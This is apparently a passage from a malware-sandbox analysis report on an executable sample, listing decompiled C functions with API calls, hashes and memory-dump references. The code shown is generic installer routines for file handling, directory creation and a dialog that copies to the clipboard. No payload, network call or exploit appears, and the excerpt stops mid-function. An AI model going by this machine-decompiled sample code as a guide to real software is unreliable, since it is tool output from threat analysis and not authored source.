                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                  • String ID:
                                                  • API String ID: 2547128583-0
                                                  • Opcode ID: 2602b990a6be508378c6e42cd022796474ee903161cb72c2cb5a68df28a06255
                                                  • Instruction ID: 21d738a59780ab69202fff5272367df6aef59ea6a60bf168f6e21a2e897772da
                                                  • Opcode Fuzzy Hash: 2602b990a6be508378c6e42cd022796474ee903161cb72c2cb5a68df28a06255
                                                  • Instruction Fuzzy Hash: 0EE086326441106AD621DA749D0496B72AC9E84740702487EF906F6191D7389C219A6A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004059D2 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 68%
                                                  			E004059D2(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                  0x004059d6
                                                  0x004059e3
                                                  0x004059f8
                                                  0x004059fe

                                                  APIs
                                                  • GetFileAttributesA.KERNELBASE(00000003,00402CCB,C:\Users\user\Desktop\Lc8xQv8iZY.exe,80000000,00000003), ref: 004059D6
                                                  • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059F8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: File$AttributesCreate
                                                  • String ID:
                                                  • API String ID: 415043291-0
                                                  • Opcode ID: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                                                  • Instruction ID: 90a47e22fdd321f70bf06df01bfdefa11f3e73682391c7296034eb3a8fe04f39
                                                  • Opcode Fuzzy Hash: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                                                  • Instruction Fuzzy Hash: 8CD09E31658301AFEF098F20DD1AF2E7AA2EB84B00F10562CB646940E0D6715815DB16
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00405526 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00405526(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                  0x0040552c
                                                  0x00405534
                                                  0x00000000
                                                  0x0040553a
                                                  0x00000000

                                                  APIs
                                                  • CreateDirectoryA.KERNELBASE(?,00000000,00403242,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 0040552C
                                                  • GetLastError.KERNEL32 ref: 0040553A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: CreateDirectoryErrorLast
                                                  • String ID:
                                                  • API String ID: 1375471231-0
                                                  • Opcode ID: 62594c709cce2f5b8fb8ca5d54e7f3286412bfa0f130784d9dc04a2d264f0cc1
                                                  • Instruction ID: ef4cf1633336d89bd9081ea15a94d355bc31ae876b4da9069c07bcdb8eac4916
                                                  • Opcode Fuzzy Hash: 62594c709cce2f5b8fb8ca5d54e7f3286412bfa0f130784d9dc04a2d264f0cc1
                                                  • Instruction Fuzzy Hash: 9DC08C30A08101BAD7100B30EE08B073AA5AB00340F104435A206E40F4D6349000CD3E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004059B3 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E004059B3(CHAR* _a4) {
				signed char _t3;
				int _t5;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					_t5 = SetFileAttributesA(_a4, _t3 & 0x000000fe); // executed
					return _t5;
				}
				return _t3;
			}





                                                  0x004059b7
                                                  0x004059c0
                                                  0x004059c9
                                                  0x00000000
                                                  0x004059c9
                                                  0x004059cf

                                                  APIs
                                                  • GetFileAttributesA.KERNELBASE(?,004057BE,?,?,?), ref: 004059B7
                                                  • SetFileAttributesA.KERNELBASE(?,00000000), ref: 004059C9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: 074f941138e9f1df105fff9ec0b177d36ae7deb3ea45ba36f2ce8c3e98632dd9
                                                  • Instruction ID: 1a2f65c413df3ce73f95872002610f1c5d23223b0cff369f14e5668d8f4fdbee
                                                  • Opcode Fuzzy Hash: 074f941138e9f1df105fff9ec0b177d36ae7deb3ea45ba36f2ce8c3e98632dd9
                                                  • Instruction Fuzzy Hash: 3CC04CF1818641ABD6015B34DF4D81F7F66EB50321B108B35F169A01F0CB315C66DA1A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004031D5 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E004031D5(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409014, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





                                                  0x004031d9
                                                  0x004031ec
                                                  0x004031f4
                                                  0x00000000
                                                  0x004031fb
                                                  0x00000000
                                                  0x004031fd

                                                  APIs
                                                  • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00413120,0040B120,004030DA,00413120,00004000,?,00000000,?,00402F64,00000004,00000000,00000000), ref: 004031EC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: 0be395bbe571093c8e78859d05ee89954336de5599fe3087c5eab9dc4054fae4
                                                  • Instruction ID: d6fbb751533e8173f5cb9bb8eb792094bbd109b1eecd8ff5b75a0af7a5988eec
                                                  • Opcode Fuzzy Hash: 0be395bbe571093c8e78859d05ee89954336de5599fe3087c5eab9dc4054fae4
                                                  • Instruction Fuzzy Hash: 77E08C32104118BBDF209F619C05EA73F5CEB053A2F00C037FA25E52A1D230EA149BA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00403207 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00403207(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409014, _a4, 0, 0); // executed
				return _t2;
			}




                                                  0x00403215
                                                  0x0040321b

                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EB3,?), ref: 00403215
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  • Opcode ID: 1fe8ad6970e23be315a08abdb90e0b058f57890677f29add635e0ec7003afc6f
                                                  • Instruction ID: 89776e93a0172b97a38fb7948c015c90ed7fb14eba3da05579cbd58eb2c2bcc6
                                                  • Opcode Fuzzy Hash: 1fe8ad6970e23be315a08abdb90e0b058f57890677f29add635e0ec7003afc6f
                                                  • Instruction Fuzzy Hash: 87B01271644200BFDB214F00DF06F057B61A794701F108030B744380F082712830EB1E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00405819 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00405819(CHAR* _a4, intOrPtr _a8) {
				CHAR* _t3;
				char _t4;

				_t3 = _a4;
				while(1) {
					_t4 =  *_t3;
					if(_t4 == 0) {
						break;
					}
					if(_t4 != _a8) {
						_t3 = CharNextA(_t3); // executed
						continue;
					}
					break;
				}
				return _t3;
			}





                                                  0x00405819
                                                  0x0040582c
                                                  0x0040582c
                                                  0x00405830
                                                  0x00000000
                                                  0x00000000
                                                  0x00405823
                                                  0x00405826
                                                  0x00000000
                                                  0x00405826
                                                  0x00000000
                                                  0x00405823
                                                  0x00405832

                                                  APIs
                                                  • CharNextA.USER32(?,0040333C,"C:\Users\user\Desktop\Lc8xQv8iZY.exe",00409130), ref: 00405826
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: CharNext
                                                  • String ID:
                                                  • API String ID: 3213498283-0
                                                  • Opcode ID: 10cd4d19b72e12b0d646a530e1cb92258a05f85d45f981c2b986421ba67828a8
                                                  • Instruction ID: 348458bb0fd59f82f13d2927d6ae723a1903e9450c7162a3bd68018b085bfddc
                                                  • Opcode Fuzzy Hash: 10cd4d19b72e12b0d646a530e1cb92258a05f85d45f981c2b986421ba67828a8
                                                  • Instruction Fuzzy Hash: 08C0803644C5406BC6507720542447F7FE4AAA1340F54D467FCC163150C2346C60CB3A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  Function 00405125 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278windowclipboardmemoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 95%
                                                  			E00405125(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				int _t94;
				int _t95;
				void* _t101;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x423764;
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E004050B9, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b || _a12 != _t154) {
								goto L20;
							} else {
								_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
								_a8 = _t87;
								if(_t87 <= _t149) {
									L37:
									return 0;
								}
								_t160 = CreatePopupMenu();
								AppendMenuA(_t160, _t149, 1, E00405D1D(_t149, _t154, _t160, _t149, 0xffffffe1));
								_t92 = _a16;
								if(_t92 != 0xffffffff) {
									_t150 = _t92;
									_t94 = _t92 >> 0x10;
								} else {
									GetWindowRect(_t154,  &_v28);
									_t150 = _v28.left;
									_t94 = _v28.top;
								}
								_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
								_t162 = 1;
								if(_t95 == 1) {
									_v60 = _t149;
									_v48 = 0x420580;
									_v44 = 0xfff;
									_a4 = _a8;
									do {
										_a4 = _a4 - 1;
										_t162 = _t162 + SendMessageA(_v8, 0x102d, _a4,  &_v68) + 2;
									} while (_a4 != _t149);
									OpenClipboard(_t149);
									EmptyClipboard();
									_t101 = GlobalAlloc(0x42, _t162);
									_a4 = _t101;
									_t163 = GlobalLock(_t101);
									do {
										_v48 = _t163;
										_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
										 *_t164 = 0xa0d;
										_t163 = _t164 + 2;
										_t149 = _t149 + 1;
									} while (_t149 < _a8);
									GlobalUnlock(_a4);
									SetClipboardData(1, _a4);
									CloseClipboard();
								}
								goto L37;
							}
						}
						if( *0x42374c == _t149) {
							ShowWindow( *0x423f88, 8);
							if( *0x42400c == _t149) {
								E00404FE7( *((intOrPtr*)( *0x41fd50 + 0x34)), _t149);
							}
							E00403F90(1);
							goto L25;
						}
						 *0x41f948 = 2;
						E00403F90(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E0040401E(_a8, _a12, _a16);
						}
						ShowWindow( *0x423750, _t149);
						ShowWindow(_t154, 8);
						E00403FEC(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x423f90;
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x423750 = GetDlgItem(_a4, 0x403);
				 *0x423748 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x423764 = _t127;
				_v8 = _t127;
				E00403FEC( *0x423750);
				 *0x423754 = E00404889(4);
				 *0x42376c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403FB7(_a4);
				if(( *0x423f98 & 0x00000003) != 0) {
					ShowWindow( *0x423750, _t149);
					if(( *0x423f98 & 0x00000002) != 0) {
						 *0x423750 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403FEC( *0x423748);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x423f98 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}
































                                                  0x0040512e
                                                  0x00405134
                                                  0x0040513d
                                                  0x00405140
                                                  0x004052d8
                                                  0x004052fc
                                                  0x004052fc
                                                  0x0040530f
                                                  0x0040532d
                                                  0x00405334
                                                  0x0040538b
                                                  0x0040538f
                                                  0x00000000
                                                  0x00405396
                                                  0x0040539e
                                                  0x004053a6
                                                  0x004053a9
                                                  0x004054a2
                                                  0x00000000
                                                  0x004054a2
                                                  0x004053b8
                                                  0x004053c4
                                                  0x004053ca
                                                  0x004053d0
                                                  0x004053e5
                                                  0x004053eb
                                                  0x004053d2
                                                  0x004053d7
                                                  0x004053dd
                                                  0x004053e0
                                                  0x004053e0
                                                  0x004053fb
                                                  0x00405403
                                                  0x00405406
                                                  0x0040540f
                                                  0x00405412
                                                  0x00405419
                                                  0x00405420
                                                  0x00405428
                                                  0x00405428
                                                  0x0040543f
                                                  0x0040543f
                                                  0x00405446
                                                  0x0040544c
                                                  0x00405455
                                                  0x0040545c
                                                  0x00405465
                                                  0x00405467
                                                  0x0040546a
                                                  0x00405479
                                                  0x0040547b
                                                  0x00405481
                                                  0x00405482
                                                  0x00405483
                                                  0x0040548b
                                                  0x00405496
                                                  0x0040549c
                                                  0x0040549c
                                                  0x00000000
                                                  0x00405406
                                                  0x0040538f
                                                  0x0040533c
                                                  0x0040536c
                                                  0x00405374
                                                  0x0040537f
                                                  0x0040537f
                                                  0x00405386
                                                  0x00000000
                                                  0x00405386
                                                  0x00405340
                                                  0x0040534a
                                                  0x00000000
                                                  0x00405311
                                                  0x00405317
                                                  0x0040534f
                                                  0x00000000
                                                  0x00405358
                                                  0x00405320
                                                  0x00405325
                                                  0x00405328
                                                  0x00000000
                                                  0x00405328
                                                  0x0040530f
                                                  0x00405146
                                                  0x0040514a
                                                  0x00405153
                                                  0x0040515a
                                                  0x0040515d
                                                  0x00405160
                                                  0x00405163
                                                  0x00405164
                                                  0x00405165
                                                  0x0040517e
                                                  0x00405181
                                                  0x0040518b
                                                  0x0040519a
                                                  0x004051a2
                                                  0x004051aa
                                                  0x004051af
                                                  0x004051b2
                                                  0x004051be
                                                  0x004051c7
                                                  0x004051d0
                                                  0x004051f3
                                                  0x004051f9
                                                  0x0040520a
                                                  0x0040520f
                                                  0x0040521d
                                                  0x0040522b
                                                  0x0040522b
                                                  0x00405230
                                                  0x0040523e
                                                  0x0040523e
                                                  0x00405243
                                                  0x00405246
                                                  0x0040524b
                                                  0x00405257
                                                  0x00405260
                                                  0x0040526d
                                                  0x0040527c
                                                  0x0040526f
                                                  0x00405274
                                                  0x00405274
                                                  0x00405288
                                                  0x00405288
                                                  0x0040529c
                                                  0x004052a5
                                                  0x004052ae
                                                  0x004052be
                                                  0x004052ca
                                                  0x004052ca
                                                  0x00000000

                                                  APIs
                                                  • GetDlgItem.USER32 ref: 00405184
                                                  • GetDlgItem.USER32 ref: 00405193
                                                  • GetClientRect.USER32 ref: 004051D0
                                                  • GetSystemMetrics.USER32 ref: 004051D8
                                                  • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 004051F9
                                                  • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 0040520A
                                                  • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 0040521D
                                                  • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 0040522B
                                                  • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040523E
                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405260
                                                  • ShowWindow.USER32(?,00000008), ref: 00405274
                                                  • GetDlgItem.USER32 ref: 00405295
                                                  • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004052A5
                                                  • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004052BE
                                                  • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 004052CA
                                                  • GetDlgItem.USER32 ref: 004051A2
                                                    • Part of subcall function 00403FEC: SendMessageA.USER32(00000028,?,00000001,00403E1D), ref: 00403FFA
                                                  • GetDlgItem.USER32 ref: 004052E7
                                                  • CreateThread.KERNEL32 ref: 004052F5
                                                  • CloseHandle.KERNEL32(00000000), ref: 004052FC
                                                  • ShowWindow.USER32(00000000), ref: 00405320
                                                  • ShowWindow.USER32(?,00000008), ref: 00405325
                                                  • ShowWindow.USER32(00000008), ref: 0040536C
                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040539E
                                                  • CreatePopupMenu.USER32 ref: 004053AF
                                                  • AppendMenuA.USER32 ref: 004053C4
                                                  • GetWindowRect.USER32 ref: 004053D7
                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053FB
                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405436
                                                  • OpenClipboard.USER32(00000000), ref: 00405446
                                                  • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 0040544C
                                                  • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405455
                                                  • GlobalLock.KERNEL32 ref: 0040545F
                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405473
                                                  • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 0040548B
                                                  • SetClipboardData.USER32 ref: 00405496
                                                  • CloseClipboard.USER32 ref: 0040549C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                  • String ID: {
                                                  • API String ID: 590372296-366298937
                                                  • Opcode ID: 04b6882ea7cea37b6f5b214f95382faacd07c0f71360ca926f2f0a7f5b2d3af5
                                                  • Instruction ID: e424ca0b0cb309e3be77902d9308c86312c6ad68702b37108e1cfd0bc7beca4c
                                                  • Opcode Fuzzy Hash: 04b6882ea7cea37b6f5b214f95382faacd07c0f71360ca926f2f0a7f5b2d3af5
                                                  • Instruction Fuzzy Hash: 3FA13AB0900209BFDB11AFA1DD89AAE7F79FB44355F00803AFA05BA1E0C7795A41DF59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00404936 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478windowmemoryCOMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 97%
                                                  			E00404936(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				int _t196;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x423fa8;
				_t320 = SendMessageA;
				_v8 = _t182;
				_t315 = 0;
				_v32 = _t280;
				_v20 =  *0x423f90 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t289;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
							if(( *0x423f99 & 0x00000002) != 0) {
								L41:
								if(_v16 != _t315) {
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
										} else {
